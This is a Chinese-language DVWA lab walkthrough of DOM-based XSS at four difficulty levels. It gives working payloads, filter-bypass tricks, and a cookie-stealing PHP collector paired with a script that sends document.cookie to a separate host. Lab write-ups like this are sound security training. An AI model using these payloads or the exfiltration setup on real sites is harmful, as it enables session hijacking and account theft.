DVWA-XSS (DOM) DOM型跨站脚本攻击

XSS(Cross Site Scripting)，跨站脚本攻击，能使攻击者在页面嵌入一些脚本代码，用户再访问，被诱导点击时，执行恶意脚本，常见为javascript，也有Flash、VBscript，常见于盗取cookie。

DOM型XSS，是利用DOM树，DOM树就是HTML之间的标签，将标签闭合，注入<script></script>标签进行脚本的执行

LOW

审计源码



没有任何过滤

点击提交后可以看到default传参的内容为English



将English改为<script>alert(document.cookie)</script>

成功弹出cookie，利用成功

反弹cookie

真正的窃取cookie不止这么简单，我们这里在Web服务器中写一个接收cookie并保存的文件

getcookie.php

<?php
$cookie = $_GET['cookie'];
fwrite(fopen('cookie.txt','a'),'Cookie : '.$cookie."\n");
?>

然后使用javascript获取cookie值，并访问getcookie.php，getcookie.php会将cookie值保存到cookie.txt中

首先测试访问getcookie.php是否正常

http://192.168.1.131/getcookie.php?cookie=nihao



查看是否生成cookie.txt



正常执行

在default传入

default=<script>document.location='http://192.168.1.131/getcookie.php?cookie='+document.cookie</script>



执行后查看cookie.txt是否反弹成功

成功反弹

Meidum

审计源码

<?php

// 检查是否有 default 的键名 ，判断 default 传参是否为空
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {
    // 获取 default 传参的值
    $default = $_GET['default'];

    // stripos 查找字符串首次出现的位置（不区分大小写）
    // 查找到返回 true ,查找不到返回 false
    // 判断不能查找到 <script ，并且不区分大小写
    if (stripos ($default, "<script") !== false) {
        header ("location: ?default=English");
        exit;
    }
}

?>

传参中不能含有<script，不过可以使用<img />标签，带上属性onerror='alert(document.cookie)'

测试default=<img src=1 onerror=alert(document.cookie)>



并没有弹窗，使用检查查看default的值传到了哪里



通过观察，传入的值在<option></option>标签中，尝试将传入</option>将标签闭合

default=</option><img src=1 onerror=alert(document.cookie)>



闭合后依然没有弹窗，再次检查查看default值传入了哪里



还是没有闭合，值依然在value中，尝试传入</select>闭合更外一层的<select>标签

default=</select><img src=1 onerror=alert(document.cookie)>



可以看到成功弹窗，检查查看是如何闭合的

Hihg

审计源码

<?php

// 判断是否传入数据
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {

    # 判断获取的 default 传入的值，只能是一下四种
    switch ($_GET['default']) {
        case "French":
        case "English":
        case "German":
        case "Spanish":
            # ok
            break;
        // 默认选择 English
        default:
            header ("location: ?default=English");
            exit;
    }
}

?>

这里进行了一个白名单，只能是French、English、German、Spanish,否则无法执行

这里只是后端进行数据处理，将 default 的值传入页面使用的前段的javascript，前面的等级也是



从这里可以看出，将lang的值写入到页面中标签，value的值

所以，这里只要让后端检测不到即可

使用#，就可以绕过后端的检测，GET并不会获取到#号后面的内容，PHP认为#号后面注释的内容

测试default=English #<script>alert(/xss/)</script>

注意English后面时候空格的，如果不输入空格，会被当做default的值传入后端



当然&号也是可以的，&会被后端认为是另一个传参，也不会接收

default=English&<script>alert(document.cookie)</script>

&号前面是没有空格的，传参是紧密相连的

Impossible

审计源码



这里写到不做任何处理，在前段处理

查看前段代码



这里多了一个括号，这个括号就能阻止XSS了吗，我不相信

传入default=<script>alert(/xss/)</script>测试



可以看到这里没有对传入的特殊字符进行url解码，这样就过滤了<、/、#、&等特殊字符